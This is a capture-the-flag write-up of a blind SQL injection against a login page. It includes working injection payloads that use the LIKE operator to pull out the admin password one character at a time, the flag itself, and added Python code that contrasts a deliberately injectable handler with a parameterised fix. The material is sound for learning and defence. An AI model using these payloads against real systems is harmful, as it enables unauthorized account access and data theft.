This one was really rewarding.

Challenge: The website isn’t really me much, but you can still get the admin password, right?

Hint: Sometimes an error message can be just as useful.

So, the landing page looked like this:

[Screenshot: landing page]

Based on the description we know the username is admin, so let’s focus on the password field.

Entering a single quote results in an error. Great: the quote breaks the query, the error message reveals its syntax, and the field appears to be injectable.

[Screenshot: SQL error message]

Injectables

' and 1=1-- results in an Incorrect Password.

' or 1=1-- results in an interesting message:

[Screenshot: login response]

We were stuck here for a bit, but then one night we got an idea based on these two pieces of information:

  1. We’re specifically looking for the Admin password
  2. We know the query for the password field, so let’s ask it specific questions about the password

The query we used moving forward was ' or pass LIKE "%"--, which also gave the interesting message: Login Functionality Not Complete. Flag is 63 characters.

Note the use of the LIKE operator: a pattern such as "a%" matches any password that starts with a, so each query asks the database a single yes/no question, and the two different responses are the answer.

Does the password start with…?
' or pass LIKE "a%"-- : Incorrect Password.
' or pass LIKE "b%"-- : Incorrect Password.

' or pass LIKE "n%"-- : Login Functionality Not Complete. Flag is 63 characters
' or pass LIKE "o%"-- : Incorrect Password.

Alright, now we’re getting somewhere. The first letter of the password is n.
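As an added example (not the write-up's own code or the challenge's source), here is a reconstruction in Python with an in-memory SQLite table of why the probes above work and what the fix looks like: the vulnerable handler builds the query by string concatenation, echoes the raw database error, and has two distinguishable failure states, while the hardened handler uses a parameterised query and one generic response. The table, column names and the placeholder secret are assumptions; the probes are the ones from this write-up, with single-quoted LIKE patterns because SQLite may not accept double-quoted string literals.

```python
import sqlite3

# Constructed sample data (not the real challenge database): the admin
# row holds a placeholder secret that, like the flag, starts with "n".
SECRET = "not_the_real_flag_placeholder"

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    return con

def login_vulnerable(con, user, pw):
    """Query built by string concatenation, raw DB error shown to the
    client, and two distinguishable failure messages: a boolean oracle."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{pw}'"
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as e:
        return f"SQL error: {e}"  # a lone quote lands here and reveals the syntax
    if row is None:
        return "Incorrect Password."
    return "Login Functionality Not Complete"  # any row-returning injection lands here

def login_hardened(con, user, pw):
    """Parameterised query: the input can never become SQL syntax, and every
    failure, including a database error, yields the same generic message."""
    try:
        row = con.execute(
            "SELECT user FROM users WHERE user=? AND pass=?", (user, pw)
        ).fetchone()
    except sqlite3.Error:
        return "Invalid credentials."  # log the error server-side; never echo it
    return "Logged in." if row else "Invalid credentials."

# The probes from the write-up (single-quoted LIKE patterns for SQLite).
PROBES = ["'", "' and 1=1--", "' or 1=1--",
          "' or pass LIKE 'n%'--", "' or pass LIKE 'o%'--"]

def leaks_oracle(login, con, probes=PROBES):
    """Defender's check: does this login handler answer different probes with
    different responses, i.e. can it be used as a yes/no oracle?"""
    return len({login(con, "admin", p) for p in probes}) > 1

if __name__ == "__main__":
    con = make_db()
    for p in PROBES:
        print(f"{p!r:28} vulnerable -> {login_vulnerable(con, 'admin', p)}")
    print("vulnerable leaks oracle:", leaks_oracle(login_vulnerable, con))  # True
    print("hardened leaks oracle:  ", leaks_oracle(login_hardened, con))    # False
```

The hardened handler still distinguishes a correct login from a failed one, which is unavoidable, but no attacker-controlled string can change the shape of the query, so the LIKE trick has nothing to act on.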

A bit of Go code found on GitHub and a few POST requests later (1,215 to be exact):

[Screenshot: scripting output]

…and our flag is: not_all_errors_should_be_shown_fb83c582ee9b64d1f446cfd01702e7c5